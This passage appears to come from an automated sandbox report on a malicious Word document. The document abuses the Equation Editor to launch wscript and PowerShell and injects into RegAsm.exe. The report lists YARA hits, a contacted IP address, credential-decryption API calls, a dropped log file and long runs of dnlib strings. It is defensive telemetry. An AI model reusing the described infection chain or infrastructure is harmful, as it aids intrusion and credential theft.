                  Source: Yara matchFile source: 12.2.powershell.exe.3d60b60.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.924048781.0000000000771000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.413003630.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4032, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3036, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\notpad0\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,14_2_004338C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404423 FreeLibrary,CryptUnprotectData,15_2_00404423
                  Source: powershell.exe, 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_cbbce2ea-2

                  Exploits

                  barindex
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3d60b60.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3d60b60.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.413003630.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4032, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3036, type: MEMORYSTR
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 91.134.96.177 Port: 80Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                  Source: ~WRF{29D0D8AE-3680-4F24-B6B5-4CF617677437}.tmp.0.drStream path '_1789191966/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                  Privilege Escalation

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407538 _wcslen,CoGetObject,14_2_00407538
                  Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49164 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49166 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.22:49172 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49163 version: TLS 1.2
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000C.00000002.411668691.0000000000420000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.411646477.00000000003A9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000C.00000002.411668691.0000000000420000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.411646477.00000000003A9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.pdb source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000C.00000002.413003630.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.416378944.00000000063B0000.00000004.08000000.00040000.00000000.sdmp
